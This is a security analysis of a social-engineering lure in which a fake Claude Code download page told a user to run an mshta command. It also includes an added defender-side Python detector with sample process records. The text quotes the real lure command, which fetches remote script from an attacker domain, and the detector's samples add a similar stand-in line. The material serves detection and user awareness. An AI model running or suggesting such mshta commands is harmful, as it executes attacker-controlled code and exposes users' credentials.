Detailed Analysis
A Reddit user's account of attempting to download Claude Code and inadvertently running a suspicious PowerShell command is a textbook example of a social engineering attack targeting users of Anthropic's AI tools. The user searched for Claude Code, landed on a fraudulent site — cladesktop.gitlab.io — and was instructed to execute `mshta https://desktop-version.com/app` in PowerShell. The `mshta` command (Microsoft HTML Application Host) is a well-documented attack vector routinely exploited by malware distributors because it can silently execute remote scripts under the guise of a routine application process. The user compounded their exposure by re-running the command with administrator privileges, which, if the payload had executed successfully, would have granted the malicious code the highest level of system access possible on a Windows machine. The blank screen and non-opening file the user observed are consistent either with a failed payload delivery or with a silent background execution that completed without visible output — neither outcome should be interpreted as proof that the system is clean.
This incident sits squarely within a broader wave of threat activity that followed Anthropic's accidental exposure of the Claude Code source code in late March 2026. When a JavaScript source map file in a public npm package revealed approximately 513,000 lines of the tool's TypeScript codebase, threat actors rapidly capitalized on the resulting public interest in Claude Code by seeding fake repositories and fraudulent download sites with trojanized packages. Security researchers at Zscaler and Trend Micro have documented malware families including Vidar, GhostSocks, and PureLog Stealer being distributed through these counterfeit Claude Code channels. The attack pattern described in the Reddit post — a lookalike domain, an urgent command-line instruction, and an obfuscated remote payload — is consistent with those documented campaigns, which are specifically engineered to exploit users who are unfamiliar with how legitimate software distribution works.
The specific mechanics of the attack deserve scrutiny. The `mshta` binary is a signed Windows executable, meaning it bypasses many basic security filters that would flag an unknown `.exe` file. Directing it at a remote URL allows attackers to serve dynamic payloads that can be swapped or updated without changing the original lure. The fact that the user observed only a brief blank window does not confirm failure; many modern stealers and trojans are designed to operate entirely in the background, exfiltrating browser credentials, session tokens, cryptocurrency wallets, and stored passwords before the user notices anything unusual. PureLog Stealer, one of the families linked to these campaigns, is specifically built for silent credential harvesting from browsers and application keystores.
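A defender-side check for the pattern described above, as an added example that is not part of the original article: it scans process-creation records for `mshta` launched with an http(s) URL and reports whether the launch was elevated. The record fields (`user`, `elevated`, `command_line`) and the sample events are assumptions constructed for illustration; only the first command line is the one quoted in the article.

```python
import re

# mshta / mshta.exe used as a program name (bare, quoted, or with a path),
# followed by its arguments. A file name such as "mshta-notes.txt" does not match.
MSHTA_RE = re.compile(r'(?:^|[\s"\\/])mshta(?:\.exe)?"?\s+(?P<args>.+)$', re.IGNORECASE)
URL_RE = re.compile(r'\bhttps?://[^\s"\']+', re.IGNORECASE)


def find_remote_mshta(events):
    """Return (user, elevated, url) for every event where mshta is handed a remote URL."""
    hits = []
    for ev in events:
        m = MSHTA_RE.search(ev["command_line"])
        if not m:
            continue  # mshta was not the program being launched
        url = URL_RE.search(m.group("args"))
        if url:  # a local .hta path is not flagged, a remote URL is
            hits.append((ev["user"], ev["elevated"], url.group(0)))
    return hits


# Constructed sample records (hypothetical schema, not real telemetry).
SAMPLE_EVENTS = [
    # The command quoted in the article, then the same command re-run elevated.
    {"user": "alice", "elevated": False,
     "command_line": "mshta https://desktop-version.com/app"},
    {"user": "alice", "elevated": True,
     "command_line": '"C:\\Windows\\System32\\mshta.exe" https://desktop-version.com/app'},
    # Wrapped in cmd.exe, upper-case, plain http.
    {"user": "bob", "elevated": False,
     "command_line": "cmd.exe /c MSHTA.EXE HTTP://example.invalid/x.hta"},
    # Benign: local HTA file, and a file whose name merely contains "mshta".
    {"user": "bob", "elevated": False,
     "command_line": "C:\\Windows\\System32\\mshta.exe C:\\Tools\\inventory.hta"},
    {"user": "carol", "elevated": False,
     "command_line": "notepad.exe C:\\notes\\mshta-notes.txt"},
]

if __name__ == "__main__":
    for user, elevated, url in find_remote_mshta(SAMPLE_EVENTS):
        level = "ELEVATED" if elevated else "standard"
        print(f"remote mshta launch by {user} ({level}): {url}")
```

Because the lure can serve a different payload on each request, a hit here indicates that remote script content was requested, not what it did; the host still needs the follow-up steps the article lists.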
The broader trend this incident reflects is the systematic exploitation of AI tool adoption curves. As Anthropic's products — particularly developer-facing tools like Claude Code — grow in popularity, they become increasingly attractive lures for threat actors. Legitimate software distribution for Claude Code occurs exclusively through Anthropic's official channels and verified npm packages, not through GitLab pages or commands that fetch remote scripts via `mshta`. The user's experience underscores a critical gap: the rapid mainstream adoption of AI coding tools is outpacing user awareness of how those tools are actually distributed and installed. Anthropic has publicly recommended Zero Trust architecture and careful verification of package sources, but these recommendations presuppose a level of technical literacy that many new users do not yet possess.
For the user in question, the appropriate immediate steps would be to run a full system scan with a reputable anti-malware tool, change all passwords stored in browsers or password managers from a separate, unaffected device, revoke any active session tokens for sensitive accounts, and monitor financial accounts for unauthorized activity. The ambiguous outcome — a file that would not open and a brief blank PowerShell window — is not reassuring evidence of a failed attack. It is, instead, consistent with how the most effective modern malware operates: quietly, quickly, and without drawing attention to itself.